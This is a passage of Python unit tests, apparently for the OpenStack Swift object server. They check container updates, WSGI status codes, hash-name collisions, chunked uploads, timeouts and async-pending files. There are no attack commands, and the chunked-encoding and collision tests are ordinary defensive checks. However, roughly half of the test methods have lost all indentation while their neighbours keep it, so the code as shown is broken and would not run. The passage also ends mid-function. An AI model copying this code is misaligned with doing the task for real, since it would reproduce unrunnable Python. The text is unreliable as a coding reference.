            with fake_spawn():
                resp = req.get_response(self.object_controller)
        self.assertRaises(StopIteration, fake_conn.code_iter.next)
        self.assertEqual(resp.status_int, 201)
        self.assertEqual(1, len(container_updates))
        for update in container_updates:
            ip, port, method, path, headers = update
            self.assertEqual(ip, '10.0.0.1')
            self.assertEqual(port, '8080')
            self.assertEqual(method, 'PUT')
            self.assertEqual(path, '/sda1/p/a/c/o')
            expected = {
                'X-Size': len('test3'),
                'X-Etag': md5('test3').hexdigest(),
                'X-Content-Type': 'text/enriched',
                'X-Timestamp': overwrite_timestamp,
            }
            for key, value in expected.items():
                self.assertEqual(headers[key], str(value))
        container_updates = []  # reset
        # read back overwrite
        req = Request.blank('/sda1/p/a/c/o', method='GET')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.headers['X-Timestamp'],
                         utils.Timestamp(overwrite_timestamp).normal)
        self.assertEqual(resp.headers['X-Backend-Timestamp'],
                         overwrite_timestamp)
        self.assertEqual(resp.body, 'test3')
        # delete with an offset
        offset_delete = utils.Timestamp(overwrite_timestamp,
                                        offset=1).internal
        req = Request.blank('/sda1/p/a/c/o', method='DELETE',
                            headers={'X-Timestamp': offset_delete,
                                     'X-Container-Host': '10.0.0.1:8080',
                                     'X-Container-Device': 'sda1',
                                     'X-Container-Partition': 'p'})
        with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
            with fake_spawn():
                resp = req.get_response(self.object_controller)
        self.assertRaises(StopIteration, fake_conn.code_iter.next)
        self.assertEqual(resp.status_int, 204)
        self.assertEqual(1, len(container_updates))
        for update in container_updates:
            ip, port, method, path, headers = update
            self.assertEqual(ip, '10.0.0.1')
            self.assertEqual(port, '8080')
            self.assertEqual(method, 'DELETE')
            self.assertEqual(path, '/sda1/p/a/c/o')
            expected = {
                'X-Timestamp': offset_delete,
            }
            for key, value in expected.items():
                self.assertEqual(headers[key], str(value))
        container_updates = []  # reset
        # read back offset delete
        req = Request.blank('/sda1/p/a/c/o', method='GET')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        self.assertEqual(resp.headers['X-Timestamp'], None)
        self.assertEqual(resp.headers['X-Backend-Timestamp'], offset_delete)
        # and one more delete with a newer timestamp
        delete_timestamp = next(self.ts).internal
        req = Request.blank('/sda1/p/a/c/o', method='DELETE',
                            headers={'X-Timestamp': delete_timestamp,
                                     'X-Container-Host': '10.0.0.1:8080',
                                     'X-Container-Device': 'sda1',
                                     'X-Container-Partition': 'p'})
        with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
            with fake_spawn():
                resp = req.get_response(self.object_controller)
        self.assertRaises(StopIteration, fake_conn.code_iter.next)
        self.assertEqual(resp.status_int, 404)
        self.assertEqual(1, len(container_updates))
        for update in container_updates:
            ip, port, method, path, headers = update
            self.assertEqual(ip, '10.0.0.1')
            self.assertEqual(port, '8080')
            self.assertEqual(method, 'DELETE')
            self.assertEqual(path, '/sda1/p/a/c/o')
            expected = {
                'X-Timestamp': delete_timestamp,
            }
            for key, value in expected.items():
                self.assertEqual(headers[key], str(value))
        container_updates = []  # reset
        # read back delete
        req = Request.blank('/sda1/p/a/c/o', method='GET')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        self.assertEqual(resp.headers['X-Timestamp'], None)
        self.assertEqual(resp.headers['X-Backend-Timestamp'], delete_timestamp)
def test_call_bad_request(self):
# Test swift.obj.server.ObjectController.__call__
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
self.object_controller.__call__({'REQUEST_METHOD': 'PUT',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '400 ')
def test_call_not_found(self):
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
self.object_controller.__call__({'REQUEST_METHOD': 'GET',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '404 ')
def test_call_bad_method(self):
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
self.object_controller.__call__({'REQUEST_METHOD': 'INVALID',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '405 ')
    def test_call_name_collision(self):
        """When two different object names hash to the same on-disk path
        (forced here by stubbing hash_path), the second PUT is refused with
        403 instead of silently overwriting the first object."""
        def my_check(*args):
            # Disable normal object-creation validation so the request
            # reaches the collision check.
            return False
        def my_hash_path(*args):
            # Force every name to the same hash, guaranteeing a collision.
            return md5('collide').hexdigest()
        with mock.patch("swift.obj.diskfile.hash_path", my_hash_path):
            with mock.patch("swift.obj.server.check_object_creation",
                            my_check):
                inbuf = WsgiBytesIO()
                errbuf = StringIO()
                outbuf = StringIO()
                def start_response(*args):
                    """Sends args to outbuf"""
                    outbuf.writelines(args)
                # First PUT of /a/c/o succeeds.
                self.object_controller.__call__({
                    'REQUEST_METHOD': 'PUT',
                    'SCRIPT_NAME': '',
                    'PATH_INFO': '/sda1/p/a/c/o',
                    'SERVER_NAME': '127.0.0.1',
                    'SERVER_PORT': '8080',
                    'SERVER_PROTOCOL': 'HTTP/1.0',
                    'CONTENT_LENGTH': '0',
                    'CONTENT_TYPE': 'text/html',
                    'HTTP_X_TIMESTAMP': normalize_timestamp(1.2),
                    'wsgi.version': (1, 0),
                    'wsgi.url_scheme': 'http',
                    'wsgi.input': inbuf,
                    'wsgi.errors': errbuf,
                    'wsgi.multithread': False,
                    'wsgi.multiprocess': False,
                    'wsgi.run_once': False},
                    start_response)
                self.assertEqual(errbuf.getvalue(), '')
                self.assertEqual(outbuf.getvalue()[:4], '201 ')
                inbuf = WsgiBytesIO()
                errbuf = StringIO()
                outbuf = StringIO()
                def start_response(*args):
                    """Sends args to outbuf"""
                    outbuf.writelines(args)
                # Second PUT for a different name (/b/d/x) hashes to the
                # same location and must be rejected with 403.
                self.object_controller.__call__({
                    'REQUEST_METHOD': 'PUT',
                    'SCRIPT_NAME': '',
                    'PATH_INFO': '/sda1/p/b/d/x',
                    'SERVER_NAME': '127.0.0.1',
                    'SERVER_PORT': '8080',
                    'SERVER_PROTOCOL': 'HTTP/1.0',
                    'CONTENT_LENGTH': '0',
                    'CONTENT_TYPE': 'text/html',
                    'HTTP_X_TIMESTAMP': normalize_timestamp(1.3),
                    'wsgi.version': (1, 0),
                    'wsgi.url_scheme': 'http',
                    'wsgi.input': inbuf,
                    'wsgi.errors': errbuf,
                    'wsgi.multithread': False,
                    'wsgi.multiprocess': False,
                    'wsgi.run_once': False},
                    start_response)
                self.assertEqual(errbuf.getvalue(), '')
                self.assertEqual(outbuf.getvalue()[:4], '403 ')
def test_invalid_method_doesnt_exist(self):
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.object_controller.__call__({
'REQUEST_METHOD': 'method_doesnt_exist',
'PATH_INFO': '/sda1/p/a/c/o'},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '405 ')
def test_invalid_method_is_not_public(self):
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.object_controller.__call__({'REQUEST_METHOD': '__init__',
'PATH_INFO': '/sda1/p/a/c/o'},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '405 ')
    def test_chunked_put(self):
        """A chunked-transfer PUT over a raw socket is accepted and the
        reassembled body is readable via a subsequent GET."""
        # Run the object server on an ephemeral port in a greenthread.
        listener = listen_zero()
        port = listener.getsockname()[1]
        killer = spawn(wsgi.server, listener, self.object_controller,
                       NullLogger())
        sock = connect_tcp(('localhost', port))
        fd = sock.makefile()
        # Body arrives as two chunks: "oh" (2 bytes) and " hai" (4 bytes).
        fd.write('PUT /sda1/p/a/c/o HTTP/1.1\r\nHost: localhost\r\n'
                 'Content-Type: text/plain\r\n'
                 'Connection: close\r\nX-Timestamp: %s\r\n'
                 'Transfer-Encoding: chunked\r\n\r\n'
                 '2\r\noh\r\n4\r\n hai\r\n0\r\n\r\n' % normalize_timestamp(
                     1.0))
        fd.flush()
        headers = readuntil2crlfs(fd)
        exp = 'HTTP/1.1 201'
        self.assertEqual(headers[:len(exp)], exp)
        # Read the object back over a fresh connection.
        sock = connect_tcp(('localhost', port))
        fd = sock.makefile()
        fd.write('GET /sda1/p/a/c/o HTTP/1.1\r\nHost: localhost\r\n'
                 'Connection: close\r\n\r\n')
        fd.flush()
        headers = readuntil2crlfs(fd)
        exp = 'HTTP/1.1 200'
        self.assertEqual(headers[:len(exp)], exp)
        response = fd.read()
        self.assertEqual(response, 'oh hai')
        # Tear down the greenthread running the server.
        killer.kill()
    def test_chunked_content_length_mismatch_zero(self):
        """Transfer-Encoding: chunked takes precedence over a conflicting
        Content-Length: 0 header -- the full chunked body is stored."""
        # Run the object server on an ephemeral port in a greenthread.
        listener = listen_zero()
        port = listener.getsockname()[1]
        killer = spawn(wsgi.server, listener, self.object_controller,
                       NullLogger())
        sock = connect_tcp(('localhost', port))
        fd = sock.makefile()
        # Conflicting headers: Content-Length says 0, chunked body says 6.
        fd.write('PUT /sda1/p/a/c/o HTTP/1.1\r\nHost: localhost\r\n'
                 'Content-Type: text/plain\r\n'
                 'Connection: close\r\nX-Timestamp: %s\r\n'
                 'Content-Length: 0\r\n'
                 'Transfer-Encoding: chunked\r\n\r\n'
                 '2\r\noh\r\n4\r\n hai\r\n0\r\n\r\n' % normalize_timestamp(
                     1.0))
        fd.flush()
        headers = readuntil2crlfs(fd)
        exp = 'HTTP/1.1 201'
        self.assertEqual(headers[:len(exp)], exp)
        sock = connect_tcp(('localhost', port))
        fd = sock.makefile()
        fd.write('GET /sda1/p/a/c/o HTTP/1.1\r\nHost: localhost\r\n'
                 'Connection: close\r\n\r\n')
        fd.flush()
        headers = readuntil2crlfs(fd)
        exp = 'HTTP/1.1 200'
        self.assertEqual(headers[:len(exp)], exp)
        response = fd.read()
        # The chunked body, not the zero-length one, was stored.
        self.assertEqual(response, 'oh hai')
        killer.kill()
def test_max_object_name_length(self):
timestamp = normalize_timestamp(time())
max_name_len = constraints.MAX_OBJECT_NAME_LENGTH
req = Request.blank(
'/sda1/p/a/c/' + ('1' * max_name_len),
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'DATA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/' + ('2' * (max_name_len + 1)),
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'DATA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
    def test_max_upload_time(self):
        """A PUT whose body trickles in slower than max_upload_time allows
        is aborted with 408 Request Timeout."""
        class SlowBody(object):
            # wsgi.input stub that yields one byte per read with a 0.1s
            # delay, so a 4-byte body takes ~0.4s to arrive.
            def __init__(self):
                self.sent = 0
            def read(self, size=-1):
                if self.sent < 4:
                    sleep(0.1)
                    self.sent += 1
                    return ' '
                return ''
            def set_hundred_continue_response_headers(*a, **kw):
                pass
        # With the default (generous) max_upload_time the slow PUT succeeds.
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT', 'wsgi.input': SlowBody()},
            headers={'X-Timestamp': normalize_timestamp(time()),
                     'Content-Length': '4', 'Content-Type': 'text/plain'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Shrink the allowance below the body's arrival time -> 408.
        self.object_controller.max_upload_time = 0.1
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT', 'wsgi.input': SlowBody()},
            headers={'X-Timestamp': normalize_timestamp(time()),
                     'Content-Length': '4', 'Content-Type': 'text/plain'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 408)
    def test_short_body(self):
        """A body shorter than the declared Content-Length produces a 499
        (client disconnect) response."""
        class ShortBody(object):
            # wsgi.input stub that delivers fewer bytes than the declared
            # Content-Length of 4, then reports EOF.
            def __init__(self):
                self.sent = False
            def read(self, size=-1):
                if not self.sent:
                    self.sent = True
                    return '   '
                return ''
            def set_hundred_continue_response_headers(*a, **kw):
                pass
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT', 'wsgi.input': ShortBody()},
            headers={'X-Timestamp': normalize_timestamp(time()),
                     'Content-Length': '4', 'Content-Type': 'text/plain'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 499)
    def test_bad_sinces(self):
        """Malformed or out-of-range If-(Un)Modified-Since header values are
        ignored rather than rejected: the GET still returns 200."""
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(time()),
                     'Content-Length': '4', 'Content-Type': 'text/plain'},
            body='    ')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Unparseable If-Unmodified-Since is ignored.
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
            headers={'If-Unmodified-Since': 'Not a valid date'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # Unparseable If-Modified-Since is ignored.
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
            headers={'If-Modified-Since': 'Not a valid date'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # A date past datetime.max cannot be represented -> also ignored.
        too_big_date_list = list(datetime.datetime.max.timetuple())
        too_big_date_list[0] += 1  # bump up the year
        too_big_date = strftime(
            "%a, %d %b %Y %H:%M:%S UTC", struct_time(too_big_date_list))
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
            headers={'If-Unmodified-Since': too_big_date})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
def test_content_encoding(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4', 'Content-Type': 'text/plain',
'Content-Encoding': 'gzip'},
body=' ')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['content-encoding'], 'gzip')
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['content-encoding'], 'gzip')
def test_async_update_http_connect(self):
policy = random.choice(list(POLICIES))
self._stage_tmp_dir(policy)
given_args = []
def fake_http_connect(*args):
given_args.extend(args)
raise Exception('test')
orig_http_connect = object_server.http_connect
try:
object_server.http_connect = fake_http_connect
self.object_controller.async_update(
'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
{'x-timestamp': '1', 'x-out': 'set',
'X-Backend-Storage-Policy-Index': int(policy)}, 'sda1',
policy)
finally:
object_server.http_connect = orig_http_connect
self.assertEqual(
given_args,
['127.0.0.1', '1234', 'sdc1', 1, 'PUT', '/a/c/o', {
'x-timestamp': '1', 'x-out': 'set',
'user-agent': 'object-server %s' % os.getpid(),
'X-Backend-Storage-Policy-Index': int(policy)}])
    @patch_policies([StoragePolicy(0, 'zero', True),
                     StoragePolicy(1, 'one'),
                     StoragePolicy(37, 'fantastico')])
    def test_updating_multiple_delete_at_container_servers(self):
        """A PUT with X-Delete-At updates the container server AND every
        listed delete-at (expirer) host; the expirer updates always use the
        system storage policy index 0."""
        # update router post patch
        self.object_controller._diskfile_router = diskfile.DiskFileRouter(
            self.conf, self.object_controller.logger)
        policy = random.choice(list(POLICIES))
        self.object_controller.expiring_objects_account = 'exp'
        self.object_controller.expiring_objects_container_divisor = 60
        http_connect_args = []
        def fake_http_connect(ipaddr, port, device, partition, method, path,
                              headers=None, query_string=None, ssl=False):
            class SuccessfulFakeConn(object):
                # Minimal connection stub: reports 200 and an empty body.
                @property
                def status(self):
                    return 200
                def getresponse(self):
                    return self
                def read(self):
                    return ''
            captured_args = {'ipaddr': ipaddr, 'port': port,
                             'device': device, 'partition': partition,
                             'method': method, 'path': path, 'ssl': ssl,
                             'headers': headers, 'query_string': query_string}
            http_connect_args.append(
                dict((k, v) for k, v in captured_args.items()
                     if v is not None))
            return SuccessfulFakeConn()
        # Two delete-at hosts/devices are listed, so three updates total
        # (one container + two expirer) are expected.
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': '12345',
                     'Content-Type': 'application/burrito',
                     'Content-Length': '0',
                     'X-Backend-Storage-Policy-Index': int(policy),
                     'X-Container-Partition': '20',
                     'X-Container-Host': '1.2.3.4:5',
                     'X-Container-Device': 'sdb1',
                     'X-Delete-At': 9999999999,
                     'X-Delete-At-Container': '9999999960',
                     'X-Delete-At-Host': "10.1.1.1:6201,10.2.2.2:6202",
                     'X-Delete-At-Partition': '6237',
                     'X-Delete-At-Device': 'sdp,sdq'})
        with mock.patch.object(
                object_server, 'http_connect', fake_http_connect):
            with fake_spawn():
                resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Sort by IP for a deterministic comparison order.
        http_connect_args.sort(key=operator.itemgetter('ipaddr'))
        self.assertEqual(len(http_connect_args), 3)
        self.assertEqual(
            http_connect_args[0],
            {'ipaddr': '1.2.3.4',
             'port': '5',
             'path': '/a/c/o',
             'device': 'sdb1',
             'partition': '20',
             'method': 'PUT',
             'ssl': False,
             'headers': HeaderKeyDict({
                 'x-content-type': 'application/burrito',
                 'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
                 'x-size': '0',
                 'x-timestamp': utils.Timestamp('12345').internal,
                 'referer': 'PUT http://localhost/sda1/p/a/c/o',
                 'user-agent': 'object-server %d' % os.getpid(),
                 'X-Backend-Storage-Policy-Index': int(policy),
                 'x-trans-id': '-'})})
        self.assertEqual(
            http_connect_args[1],
            {'ipaddr': '10.1.1.1',
             'port': '6201',
             'path': '/exp/9999999960/9999999999-a/c/o',
             'device': 'sdp',
             'partition': '6237',
             'method': 'PUT',
             'ssl': False,
             'headers': HeaderKeyDict({
                 'x-content-type': 'text/plain',
                 'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
                 'x-size': '0',
                 'x-timestamp': utils.Timestamp('12345').internal,
                 'referer': 'PUT http://localhost/sda1/p/a/c/o',
                 'user-agent': 'object-server %d' % os.getpid(),
                 # system account storage policy is 0
                 'X-Backend-Storage-Policy-Index': 0,
                 'x-trans-id': '-'})})
        self.assertEqual(
            http_connect_args[2],
            {'ipaddr': '10.2.2.2',
             'port': '6202',
             'path': '/exp/9999999960/9999999999-a/c/o',
             'device': 'sdq',
             'partition': '6237',
             'method': 'PUT',
             'ssl': False,
             'headers': HeaderKeyDict({
                 'x-content-type': 'text/plain',
                 'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
                 'x-size': '0',
                 'x-timestamp': utils.Timestamp('12345').internal,
                 'referer': 'PUT http://localhost/sda1/p/a/c/o',
                 'user-agent': 'object-server %d' % os.getpid(),
                 # system account storage policy is 0
                 'X-Backend-Storage-Policy-Index': 0,
                 'x-trans-id': '-'})})
    @patch_policies([StoragePolicy(0, 'zero', True),
                     StoragePolicy(1, 'one'),
                     StoragePolicy(26, 'twice-thirteen')])
    def test_updating_multiple_container_servers(self):
        """When X-Container-Host/Device list two replicas, the PUT sends one
        container update to each, both carrying the request's storage-policy
        index."""
        # update router post patch
        self.object_controller._diskfile_router = diskfile.DiskFileRouter(
            self.conf, self.object_controller.logger)
        http_connect_args = []
        def fake_http_connect(ipaddr, port, device, partition, method, path,
                              headers=None, query_string=None, ssl=False):
            class SuccessfulFakeConn(object):
                # Minimal connection stub: reports 200 and an empty body.
                @property
                def status(self):
                    return 200
                def getresponse(self):
                    return self
                def read(self):
                    return ''
            captured_args = {'ipaddr': ipaddr, 'port': port,
                             'device': device, 'partition': partition,
                             'method': method, 'path': path, 'ssl': ssl,
                             'headers': headers, 'query_string': query_string}
            http_connect_args.append(
                dict((k, v) for k, v in captured_args.items()
                     if v is not None))
            return SuccessfulFakeConn()
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': '12345',
                     'Content-Type': 'application/burrito',
                     'Content-Length': '0',
                     'X-Backend-Storage-Policy-Index': '26',
                     'X-Container-Partition': '20',
                     'X-Container-Host': '1.2.3.4:5, 6.7.8.9:10',
                     'X-Container-Device': 'sdb1, sdf1'})
        with mock.patch.object(
                object_server, 'http_connect', fake_http_connect):
            with fake_spawn():
                req.get_response(self.object_controller)
        # Sort by IP for a deterministic comparison order.
        http_connect_args.sort(key=operator.itemgetter('ipaddr'))
        self.assertEqual(len(http_connect_args), 2)
        self.assertEqual(
            http_connect_args[0],
            {'ipaddr': '1.2.3.4',
             'port': '5',
             'path': '/a/c/o',
             'device': 'sdb1',
             'partition': '20',
             'method': 'PUT',
             'ssl': False,
             'headers': HeaderKeyDict({
                 'x-content-type': 'application/burrito',
                 'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
                 'x-size': '0',
                 'x-timestamp': utils.Timestamp('12345').internal,
                 'X-Backend-Storage-Policy-Index': '26',
                 'referer': 'PUT http://localhost/sda1/p/a/c/o',
                 'user-agent': 'object-server %d' % os.getpid(),
                 'x-trans-id': '-'})})
        self.assertEqual(
            http_connect_args[1],
            {'ipaddr': '6.7.8.9',
             'port': '10',
             'path': '/a/c/o',
             'device': 'sdf1',
             'partition': '20',
             'method': 'PUT',
             'ssl': False,
             'headers': HeaderKeyDict({
                 'x-content-type': 'application/burrito',
                 'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
                 'x-size': '0',
                 'x-timestamp': utils.Timestamp('12345').internal,
                 'X-Backend-Storage-Policy-Index': '26',
                 'referer': 'PUT http://localhost/sda1/p/a/c/o',
                 'user-agent': 'object-server %d' % os.getpid(),
                 'x-trans-id': '-'})})
def test_object_delete_at_async_update(self):
policy = random.choice(list(POLICIES))
container_updates = []
def capture_updates(ip, port, method, path, headers, *args, **kwargs):
container_updates.append((ip, port, method, path, headers))
put_timestamp = next(self.ts).internal
delete_at_timestamp = utils.normalize_delete_at_timestamp(
next(self.ts).normal)
delete_at_container = (
int(delete_at_timestamp) /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
headers = {
'Content-Type': 'text/plain',
'X-Timestamp': put_timestamp,
'X-Container-Host': '10.0.0.1:6201',
'X-Container-Device': 'sda1',
'X-Container-Partition': 'p',
'X-Delete-At': delete_at_timestamp,
'X-Delete-At-Container': delete_at_container,
'X-Delete-At-Partition': 'p',
'X-Delete-At-Host': '10.0.0.2:6202',
'X-Delete-At-Device': 'sda1',
'X-Backend-Storage-Policy-Index': int(policy)}
if policy.policy_type == EC_POLICY:
headers['X-Object-Sysmeta-Ec-Frag-Index'] = '2'
req = Request.blank(
'/sda1/p/a/c/o', method='PUT', body='', headers=headers)
with mocked_http_conn(
500, 500, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(2, len(container_updates))
delete_at_update, container_update = container_updates
# delete_at_update
ip, port, method, path, headers = delete_at_update
self.assertEqual(ip, '10.0.0.2')
self.assertEqual(port, '6202')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/sda1/p/.expiring_objects/%s/%s-a/c/o' %
(delete_at_container, delete_at_timestamp))
expected = {
'X-Timestamp': put_timestamp,
# system account storage policy is 0
'X-Backend-Storage-Policy-Index': 0,
}
for key, value in expected.items():
self.assertEqual(headers[key], str(value))
# container_update
ip, port, method, path, headers = container_update
self.assertEqual(ip, '10.0.0.1')
self.assertEqual(port, '6201')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/sda1/p/a/c/o')
expected = {
'X-Timestamp': put_timestamp,
'X-Backend-Storage-Policy-Index': int(policy),
}
for key, value in expected.items():
self.assertEqual(headers[key], str(value))
# check async pendings
async_dir = os.path.join(self.testdir, 'sda1',
diskfile.get_async_dir(policy))
found_files = []
for root, dirs, files in os.walk(async_dir):
for f in files:
async_file = os.path.join(root, f)
found_files.append(async_file)
data = pickle.load(open(async_file))
if data['account'] == 'a':
self.assertEqual(
int(data['headers']
['X-Backend-Storage-Policy-Index']), int(policy))
elif data['account'] == '.expiring_objects':
self.assertEqual(
int(data['headers']
['X-Backend-Storage-Policy-Index']), 0)
else:
self.fail('unexpected async pending data')
self.assertEqual(2, len(found_files))
def test_async_update_saves_on_exception(self):
policy = random.choice(list(POLICIES))
self._stage_tmp_dir(policy)
_prefix = utils.HASH_PATH_PREFIX
utils.HASH_PATH_PREFIX = ''
def fake_http_connect(*args):
raise Exception('test')
orig_http_connect = object_server.http_connect
try:
object_server.http_connect = fake_http_connect
self.object_controller.async_update(
'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
{'x-timestamp': '1', 'x-out': 'set',
'X-Backend-Storage-Policy-Index': int(policy)}, 'sda1',
policy)
finally:
object_server.http_connect = orig_http_connect
utils.HASH_PATH_PREFIX = _prefix
async_dir = diskfile.get_async_dir(policy)
self.assertEqual(
pickle.load(open(os.path.join(
self.testdir, 'sda1', async_dir, 'a83',
'06fbf0b514e5199dfc4e00f42eb5ea83-%s' %
utils.Timestamp(1).internal))),
{'headers': {'x-timestamp': '1', 'x-out': 'set',
'user-agent': 'object-server %s' % os.getpid(),
'X-Backend-Storage-Policy-Index': int(policy)},
'account': 'a', 'container': 'c', 'obj': 'o', 'op': 'PUT'})
def test_async_update_saves_on_non_2xx(self):
policy = random.choice(list(POLICIES))
self._stage_tmp_dir(policy)
_prefix = utils.HASH_PATH_PREFIX
utils.HASH_PATH_PREFIX = ''
def fake_http_connect(status):
class FakeConn(object):
def __init__(self, status):
self.status = status
def getresponse(self):
return self
def read(self):
return ''
return lambda *args: FakeConn(status)
orig_http_connect = object_server.http_connect
try:
for status in (199, 300, 503):
object_server.http_connect = fake_http_connect(status)
self.object_controller.async_update(
'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
{'x-timestamp': '1', 'x-out': str(status),
'X-Backend-Storage-Policy-Index': int(policy)}, 'sda1',
policy)
async_dir = diskfile.get_async_dir(policy)
self.assertEqual(
pickle.load(open(os.path.join(
self.testdir, 'sda1', async_dir, 'a83',
'06fbf0b514e5199dfc4e00f42eb5ea83-%s' %
utils.Timestamp(1).internal))),
{'headers': {'x-timestamp': '1', 'x-out': str(status),
'user-agent':
'object-server %s' % os.getpid(),
'X-Backend-Storage-Policy-Index':
int(policy)},
'account': 'a', 'container': 'c', 'obj': 'o',
'op': 'PUT'})
finally:
object_server.http_connect = orig_http_connect
utils.HASH_PATH_PREFIX = _prefix
def test_async_update_does_not_save_on_2xx(self):
_prefix = utils.HASH_PATH_PREFIX
utils.HASH_PATH_PREFIX = ''
def fake_http_connect(status):
class FakeConn(object):
def __init__(self, status):
self.status = status
def getresponse(self):
return self
def read(self):
return ''
return lambda *args: FakeConn(status)
orig_http_connect = object_server.http_connect
try:
for status in (200, 299):
object_server.http_connect = fake_http_connect(status)
self.object_controller.async_update(
'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
{'x-timestamp': '1', 'x-out': str(status)}, 'sda1', 0)
self.assertFalse(
os.path.exists(os.path.join(
self.testdir, 'sda1', 'async_pending', 'a83',
'06fbf0b514e5199dfc4e00f42eb5ea83-0000000001.00000')))
finally:
object_server.http_connect = orig_http_connect
utils.HASH_PATH_PREFIX = _prefix
    def test_async_update_saves_on_timeout(self):
        # If the container server takes longer than node_timeout to answer,
